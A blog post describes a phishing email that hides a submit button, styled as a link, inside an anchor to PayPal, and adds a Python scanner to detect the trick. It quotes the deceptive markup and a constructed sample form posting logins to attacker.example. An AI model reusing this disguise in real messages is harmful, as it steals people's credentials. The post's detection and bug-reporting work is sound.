You’ve all seen those scams where an email claims that your eBay or PayPal account has been compromised and gives a link directly to the login page, which you can easily see is fake because hovering over the link shows an IP address in the status bar of your email client.
I just received an email which had me puzzled for a few minutes. It was obviously a phishing attempt, but a quick glance through the page didn’t show anything fake-looking. Hovering over the provided links showed a proper PayPal address (https://www.paypal.com/cgi-bin/webscr?cmd=_login-run). Even right-click -> copy on the links gave the right address when pasted into a browser. Puzzling.
Then I looked in the source, and found that the links were actually wrapped around a submit input which had been styled to look like a plain link. The status bar shows the surrounding anchor’s href, but clicking the input submits the enclosing form, and that form goes to a nastier place.
The fact that a submit button can look so much like a link and give no warning is a security bug in my eyes. Here is the suspicious code:
<a href="https://www.paypal.com/cgi-bin/webscr?cmd=_login-run">
  <font size="2" face="Arial, Verdana">
    <INPUT style="BORDER-RIGHT: 0pt; BORDER-TOP: 0pt; FONT-SIZE: 10pt; BORDER-LEFT: 0pt; CURSOR: hand; COLOR: blue; BORDER-BOTTOM: 0pt; BACKGROUND-COLOR: transparent; TEXT-DECORATION: underline"
           type=submit value="click here and process your login." tabindex="1">
  </font>
</a>
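As an added example (this is not code from the original post, nor from Thunderbird or Firefox), here is a small Python scanner for exactly this trick. It uses the standard library's html.parser to find submit controls (`<input type=submit>`, `<input type=image>`, `<button>`) nested inside an `<a>`, then compares the host of the link's visible href with the host of the enclosing form's action. The sample message below is constructed for the example; the post never shows where the real form submitted, so the form action host `attacker.example` is an assumption.

```python
"""Flag submit controls that are wrapped in a link whose visible href
points somewhere other than the form they actually submit to.

Added example; not code from the original post or any mail client."""
from html.parser import HTMLParser
from urllib.parse import urlsplit


def host_of(url):
    """Lower-cased host of a URL, or '' for relative or empty values."""
    return (urlsplit(url.strip()).hostname or "").lower()


class LinkedSubmitScanner(HTMLParser):
    """Tracks the enclosing <form> and <a> while walking the markup."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.forms = []      # stack of enclosing <form action=...> values
        self.anchors = []    # stack of enclosing <a href=...> values
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # html.parser lower-cases tag and attribute names for us, and gives
        # None for value-less attributes, so normalise those to ''.
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self.forms.append(a.get("action", ""))
        elif tag == "a":
            self.anchors.append(a.get("href", ""))
        elif tag in ("input", "button"):
            # <button> defaults to type=submit; <input> defaults to text.
            kind = a.get("type", "submit" if tag == "button" else "text").lower()
            if kind in ("submit", "image") and self.anchors:
                href = self.anchors[-1]
                action = self.forms[-1] if self.forms else ""
                self.findings.append({
                    "label": a.get("value", ""),
                    "href": href,            # what the status bar shows
                    "action": action,        # where a click really goes
                    "host_mismatch": host_of(href) != host_of(action),
                })

    def handle_endtag(self, tag):
        if tag == "form" and self.forms:
            self.forms.pop()
        elif tag == "a" and self.anchors:
            self.anchors.pop()


def scan(html):
    """Return one finding per submit control that sits inside a link."""
    s = LinkedSubmitScanner()
    s.feed(html)
    s.close()
    return s.findings


# Constructed sample modelled on the phish in the post. The enclosing
# <form> and its action host "attacker.example" are assumptions; the
# post only shows the <a> ... <INPUT type=submit> ... </a> fragment.
SAMPLE_EMAIL = """
<html><body>
<form method="post" action="http://attacker.example/collect">
<p>We noticed unusual activity on your account.</p>
<a href="https://www.paypal.com/cgi-bin/webscr?cmd=_login-run">
<font size="2" face="Arial, Verdana">
<INPUT style="BORDER-RIGHT: 0pt; CURSOR: hand; COLOR: blue; TEXT-DECORATION: underline"
       type=submit value="click here and process your login." tabindex="1"></font></a>
<p>Or visit the <a href="https://www.paypal.com/help">Help Center</a>.</p>
</form>
</body></html>
"""

# Constructed benign case: a submit button wrapped in a link to the same site.
SAMPLE_BENIGN = """
<form action="https://www.paypal.com/cgi-bin/webscr"><a href="https://www.paypal.com/">
<input type="submit" value="Log in"></a></form>
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_EMAIL):
        flag = "MISMATCH" if f["host_mismatch"] else "ok"
        print(f"[{flag}] '{f['label']}' looks like {f['href']} "
              f"but submits to {f['action']}")
```

Run against the sample, the scanner reports one finding: the control labelled "click here and process your login." displays a www.paypal.com href but submits to attacker.example. A relative or empty form action yields an empty host, which is also reported as a mismatch against an absolute href; in an email that is worth a look too, since a form with no action submits to whatever the message is being viewed from.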
What I think is vexing about this is that it took a look at the source to find this out. In my opinion, hovering over an input button should definitely not show a surrounding link’s URL in the status bar.
I’m submitting a bug to Thunderbird at the moment (although it’s probably more apt to submit it to Firefox – it’ll all end up in the right place, anyway) asking that hovering over a submit input show the form target’s URL in the status bar.